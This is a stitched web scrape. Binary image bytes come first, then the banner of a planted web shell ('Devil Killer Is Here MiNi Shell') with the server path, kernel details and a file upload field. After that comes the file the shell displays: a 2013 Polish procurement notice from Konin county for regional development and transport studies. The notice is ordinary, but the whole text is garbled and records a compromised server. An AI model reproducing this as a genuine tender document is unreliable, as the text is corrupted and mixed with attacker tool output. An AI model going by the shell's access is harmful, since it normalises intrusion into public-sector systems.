JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131108/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131108/456328-N-2013.html

<p class="kh_header"><b>Konin: Zadanie 1 - Opracowanie Strategii Rozwoju Obszaru Funkcjonalnego Aglomeracji 
Konińskiej. Zadanie 2 - Opracowanie Studium rozwoju transportu zrównoważonego Obszaru Funkcjonalnego Aglomeracji Konińskiej. Zadanie 3 - Opracowanie Studium rozwoju gospodarczego wraz z programem promocji terenów inwestycyjnych Obszaru Funkcjonalnego Aglomeracji Konińskiej.</b><br>
<b>Numer ogłoszenia: 456328 - 2013; data zamieszczenia: 08.11.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Koniński - Starostwo Powiatowe w Koninie , Al. 1 Maja  9, 62-510 Konin, woj. wielkopolskie, tel. 63 240 32 12, faks 63 240 32 05.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiat.konin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zadanie 1 - Opracowanie Strategii Rozwoju Obszaru Funkcjonalnego Aglomeracji 
Konińskiej. Zadanie 2 - Opracowanie Studium rozwoju transportu zrównoważonego Obszaru Funkcjonalnego Aglomeracji Konińskiej. Zadanie 3 - Opracowanie Studium rozwoju gospodarczego wraz z programem promocji terenów inwestycyjnych Obszaru Funkcjonalnego Aglomeracji Konińskiej..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Szczegółowy opis przedmiotu zamówienia określa załącznik nr 1 do SIWZ.
Przy opracowywaniu strategii lub poszczególnych studów Wykonawcay będą opierać się na danych statystycznych, przeprowadzonej wcześniej i dostarczonej przez Zamawiającego diagnozie i badaniach społecznych Obszaru Funkcjonalnego Aglomeracji Konińskiej oraz na konsultacjach społecznych, spotkaniach warsztatowych, które odbędą się w trakcie opracowywania dokumentów. Wszystkie wnioski, opinie i rekomendacje uzyskane w ramach dialogu społecznego powinny być wykorzystane przez Wykonawcę w opracowanych dokumentach strategicznych.
Obszar Funkcjonalny Aglomeracja Konińska (liczba mieszkańców: 206 084 - dane GUS 2012) złożony z partnerów samorządowych: Miasto Konin (powiat grodzki), Powiat Koniński (powiat ziemski) oraz 14 gmin powiatu konińskiego: Miasto i Gmina Golina, Miasto i Gmina Kleczew, Miasto i Gmina Rychwał, Miasto i Gmina Ślesin, Miasto i Gmina Sompolno, Gmina Grodziec, Gmina Kazimierz Biskupi, Gmina Kramsk, Gmina Krzymów, Gmina Rzgów, Gmina Skulsk, Gmina Stare Miasto, Gmina Wilczyn i Gmina Wierzbinek. 
Proponowany sposób przeprowadzenia dialogu społecznego
W trakcie prac nad opracowywaniem strategii lub poszczególnych studiów zostaną przeprowadzone:
a.konsultacje społeczne - wśród partnerów społeczno-gospodarczych, zwłaszcza lokalnych (m.in. mieszkańców, organizacji pozarządowych, podmiotów ekonomii społecznej). Konsultacji poddany zostanie wypracowany wstępny zestaw celów
 i kierunków rozwojowych OFAK. Wykonawca przygotuje merytoryczny zakres konsultacji z uwzględnieniem  mieszkańców powiatu konińskiego i Miasta Konina dla:
-Strategii rozwoju OFAK - min. 100 osób w ciągu 3 tygodni 
-Programów sektorowych OFAK - min. 120 osób z czego 60 osób na studium rozwoju transportu zrównoważonego i 60 osób na studium rozwoju gospodarczego wraz z programem promocji terenów inwestycyjnych.
b.spotkania warsztatowe na etapie tworzenia poszczególnych dokumentów
 z przedstawicielami partnerów projektu tj. min. 2 spotkania warsztatowe dla każdego dokumentu, dotyczące m.in. analizy SWOT oraz wyznaczenia celów         i zadań do zrealizowania,
c.konsultacje ze Stałym Społecznym Zespołem Konsultacyjnym (raz na kwartał)
d.konsultacje z Aglomeracyjnym Konwentem Samorządowym (raz na kwartał)
Za zorganizowanie całego procesu konsultacji odpowiedzialny będzie Wykonawca, w tym zobowiązany będzie do zapewnienia środków niezbędnych do prowadzenia warsztatów konsultacji społecznych (Zamawiający może udostępnić salę). Wykonawca zobowiązany jest do zapewnienia osoby (osób), która będzie prowadziła spotkania.
Wielkość opracowania:
a)Strategia rozwoju OFAK - min. 100 stron
b)Studium transportu zrównoważonego OFAK - min. 150 stron
c)Studium rozwoju gospodarczego wraz z programem promocji trenów inwestycyjnych OFAK - min. 150 stron.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 73.22.00.00-0, 71.24.00.00-9, 90.71.14.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku udziału w postępowaniu będzie dokonywana w oparciu 
o przedłożony przez Wykonawców  załącznik nr 3, na zasadzie spełnienia- nie spełnienia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy którzy wykażą, że w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy to w tym okresie, wykonali co najmniej:
a. 3 zamówienia dotyczące opracowania strategii rozwoju JST lub Obszaru Funkcjonalnego liczącego co najmniej 100.000 mieszkańców i 1 usługę polegającą na sporządzeniu prognozy oddziaływania na środowisko dla dokumentu strategicznego obejmującego swoim zakresem obszar JST lub obszar funkcjonalny (warunek doświadczenia dotyczy Wykonawcy składającego ofertę do zadania 1),
b.1 zamówienie dotyczące opracowania studium/strategii rozwoju transportu zrównoważonego JST lub Obszaru Funkcjonalnego liczącego co najmniej 100.000 mieszkańców i 1 usługę polegającą na sporządzeniu prognozy oddziaływania na środowisko dla dokumentu strategicznego obejmującego swoim zakresem obszar JST lub obszar funkcjonalny (warunek doświadczenia dotyczy Wykonawcy składającego ofertę do zadania 2),
c.  3 zamówienia dotyczące opracowania studium/strategii rozwoju gospodarczego wraz  z programem promocji terenów inwestycyjnych JST lub Obszaru funkcjonalnego liczącego co najmniej 100.000 mieszkańców i 1 usługę polegającą na sporządzeniu prognozy oddziaływania na środowisko dla dokumentu strategicznego obejmującego swoim zakresem obszar JST lub obszar funkcjonalny (warunek doświadczenia dotyczy Wykonawcy składającego ofertę do zadania 3),
Należyte wykonanie potwierdzone zostanie stosownymi dokumentami w oryginale lub kserokopią potwierdzoną za zgodność z oryginałem przez Wykonawcę.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy którzy wykażą, że mają do dyspozycji odpowiednio wykwalifikowany personel w celu obsadzenia podanych niżej stanowisk:
a. Osoba posiadająca doświadczenie w zakresie analiz społeczno-gospodarczych polegające na tym, że była członkiem zespołu w co najmniej jednym zadaniu porównywalnym rzeczowo z zakresem przedmiotu zamówienia tj. sporządziła analizę do strategii/studium dla JST lub Obszaru Funkcjonalnego liczącego co najmniej 100.000 mieszkańców,
b.Osoba posiadająca doświadczenie w zakresie moderowania spotkań podczas prac nad dokumentem strategicznym lub opracowaniem porównywalnym rzeczowo z zakresem przedmiotu zamówienia tj. prowadziła warsztaty, spotkania itp. służące opracowaniu strategii/studium dla JST lub Obszaru Funkcjonalnego liczącego co najmniej 100.000 mieszkańców.
c.Osoba posiadająca doświadczenie w zakresie opracowań strategicznych polegające na tym, że była członkiem zespołu w co najmniej jednym zadaniu porównywalnym rzeczowo z zakresem przedmiotu zamówienia tj. opracowywała strategię-studium dla JST lub Obszaru Funkcjonalnego liczącego co najmniej 100.000 mieszkańców.
Ocena spełnienia warunku udziału w postępowaniu będzie dokonywana w oparciu o przedłożony przez Wykonawców załącznik Nr 6, na zasadzie spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy którzy wykażą, że mają do dyspozycji odpowiednio wykwalifikowany personel w celu obsadzenia podanych niżej stanowisk:
a.Osoba posiadająca doświadczenie w zakresie analiz społeczno-gospodarczych polegające na tym, że była członkiem zespołu w co najmniej jednym zadaniu porównywalnym rzeczowo z zakresem przedmiotu zamówienia tj. sporządziła analizę do strategii-studium dla JST lub Obszaru Funkcjonalnego liczącego co najmniej 100.000 mieszkańców,
b.Osoba posiadająca doświadczenie w zakresie moderowania spotkań podczas prac nad dokumentem strategicznym lub opracowaniem porównywalnym rzeczowo z zakresem przedmiotu zamówienia tj. prowadziła warsztaty, spotkania itp. służące opracowaniu strategii/studium dla JST lub Obszaru Funkcjonalnego liczącego co najmniej 100.000 mieszkańców.
c.Osoba posiadająca doświadczenie w zakresie opracowań strategicznych polegające na tym, że była członkiem zespołu w co najmniej jednym zadaniu porównywalnym rzeczowo z zakresem przedmiotu zamówienia tj. opracowywała strategię-studium dla JST lub Obszaru Funkcjonalnego liczącego co najmniej 100.000 mieszkańców.
Ocena spełnienia warunku udziału w postępowaniu będzie dokonywana w oparciu o przedłożony przez Wykonawców załącznik Nr 6, na zasadzie spełnia-nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje opisu sposobu dokonywania oceny spełniania ww. warunku.
Ocena spełnienia warunku udziału w postępowaniu będzie dokonywana w oparciu o przedłożony przez Wykonawców załącznik Nr 3, na zasadzie spełnia-nie spełnia.
4.1.5. nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 ust. 1 Ustawy.
Ocena spełnienia warunku udziału w postępowaniu będzie dokonywana w oparciu o przedłożony przez Wykonawców załącznik Nr 3a, na zasadzie spełnia-nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość wprowadzenia następujących zmian do zawartej umowy, na podstawie art. 144 ust. 1 ustawy:
a.zgodnie z § 10 umowy, skład zespołu może być zmieniony w trakcie realizacji umowy po wcześniejszym przedstawieniu Zamawiającemu przez Wykonawcę pisemnej informacji  o proponowanej zmianie, wraz z wyjaśnieniem przyczyn proponowanej zmiany oraz wyrażeniu pisemnej zgody przez Zamawiającego. Zamawiający zaakceptuje taką zmianę wyłącznie wtedy, gdy doświadczenie proponowanych osób będzie takie samo lub wyższe od doświadczenia wymaganego w warunkach udziału w postępowaniu, o których mowa w pkt. 4.1.3 SIWZ.
b.zgodnie z § 8 ust. 2 umowy termin realizacji zamówienia może ulec zmianie          w przypadku niedotrzymania przez Zamawiającego terminu przekazania materiałów, dokumentów i danych niezbędnych do prawidłowego wykonania zamówienia -        o liczbę dni równą opóźnieniu udostępnienia materiałów, dokumentów i danych.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.powiat.konin.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Koninie
Aleje 1 Maja 9, 62-510 Konin
pok. 363. 364.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.11.2013 godzina 11:00, miejsce: Starostwo Powiatowe w Koninie
Aleje 1 Maja 9, 62-510 Konin
pok. 168 (Kancelaria).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Opracowanie Strategii Rozwoju Obszaru Funkcjonalnego Aglomeracji 
Konińskiej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres tematyczny:
1.Diagnoza obecnego stanu społeczno-gospodarczego OFAK:
-Charakterystyka obszaru (uwarunkowania historyczno-kulturalne, położenie geograficzne, podział administracyjny, zasoby naturalne, warunki przyrodnicze, ludność, zatrudnienie)
-Opis otoczenia społecznego (edukacja, ochrona zdrowia, mieszkalnictwo, kultura 
i sport, turystyka i rekreacja, opieka i pomoc społeczna, bezpieczeństwo publiczne)
-Opis infrastruktury technicznej (budownictwo mieszkaniowe, drogi i transport, łączność i telekomunikacja, zaopatrzenie w wodę i gospodarka wodno- ściekowa, gospodarka odpadami, zaopatrzenie w energię elektryczną i ciepłownictwo, zaopatrzenie w gaz)
-Opis otoczenia gospodarczego (podmioty gospodarcze, rolnictwo, leśnictwo, handel, budownictwo)
-Charakterystyka potencjału obszaru.
-Partnerstwo (organizacje pozarządowe, współpraca zagraniczna)
2.Prognoza trendów rozwojowych dla OFAK do 2030 r.
3.Odniesienie do zatwierdzonych i projektowanych strategii rozwoju obszaru, polityk wspólnotowych, krajowych i regionalnych.
4.Ogólna koncepcja rozwoju OFAK (wskazanie strategicznych przedsięwzięć        np. Zintegrowane Inwestycje Terytorialne - ZIT)
5.Analiza SWOT w tym:
-Zagospodarowanie przestrzenne, infrastruktura techniczna i ochrona środowiska,
-Infrastruktura społeczna i kapitał ludzki,
-Rozwój gospodarczy i inwestycje,
-Kultura, sport i turystyka.
6.Wyniki przeprowadzonych badań społecznych, 
7.Przebieg konsultacji społecznych,
8.Prognoza oddziaływania na środowisko Strategii Rozwoju OFAK,
9.Strategia Rozwoju OFAK
-Misja i wizja strategiczna;
-Strategiczne obszary rozwojowe;
-Priorytety i cele strategiczne;
-Działania strategiczne;
-Narzędzia realizacji strategii;
-Podmioty realizujące strategię;
10.Tryb i zasady monitoringu i ewaluacji postępów wdrażania Strategii. 
Układ dokumentu powinien zawierać poniższe, podobne lub rozszerzone elementy:
1.Strona tytułowa
2.Spis treści
3.Streszczenie (maksymalnie A4)
4.Wprowadzenie
-cel opracowania dokumentu, zadania strategii
-określenie istoty i cech Obszaru Funkcjonalnego Aglomeracji Konińskiej 
-przyjęta metodologia tworzenia strategii (sesje strategiczne, planowanie    
     partycypacyjne itp.)
5.Opis aktualnej sytuacji w aglomeracji (przegląd rynku, analiza potrzeb, analiza otoczenia, lista priorytetowych wymagań i oczekiwań zgłoszonych przez uczestników konsultacji społecznych jak i na podstawie bezpośrednio przeprowadzonych badań wśród społeczeństwa) - diagnoza obecnej sytuacji z identyfikacją głównych problemów rozwojowych.
6.Analiza strategiczna w uwzględnieniem metody SWOT.
7.Wizja, misja i cele strategiczne.
8.Analiza powiązań z istniejącymi dokumentami krajowymi i regionalnymi, analiza przeprowadzonych badań.
9.Propozycja realizacji rozwiązań i koncepcji przyjętych w czasie konsultacji społecznych:
-podmioty zaangażowane w realizację przyjętych rozwiązań
-społeczne skutki wprowadzania przyjętych rozwiązań
-sposoby i możliwości pozyskiwania funduszy zewnętrznych na uzgodnione 
     zadania
10.Propozycja wskaźników możliwych do osiągnięcia w wyniku realizacji przyjętych     rozwiązań, przewidywane korzyści ekonomiczne.
11.Wdrażanie i monitoring, szacowany budżet i potencjalne źródła finansowania.
12.Badania, ankiety i raporty opracowane na potrzeby tworzonej strategii - jako   załączniki.

Harmonogram prac:
Realizacja Strategii Rozwoju OFAK od daty zawarcia umowy do 31 lipca 2014 r:
-Przygotowanie oraz zaakceptowanie harmonogramu prac nad opracowaniem strategii, propozycja ankiety na konsultacje społeczne oraz wstępna koncepcja zawartości strategii (do 28 luty 2014 roku)
-Opracowywanie strategii rozwoju oraz przeprowadzanie dialogu społecznego (marzec - czerwiec 2014)
-Projekt opracowanej strategii (do 15 czerwca 2014 roku)
-Przedstawienie ostatecznej wersji Strategii Rozwoju OFAK (do 31 lipca 2014 roku).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 73.22.00.00-0, 71.24.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.07.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Opracowanie Studium rozwoju transportu zrównoważonego Obszaru 
Funkcjonalnego Aglomeracji Konińskiej.</p>
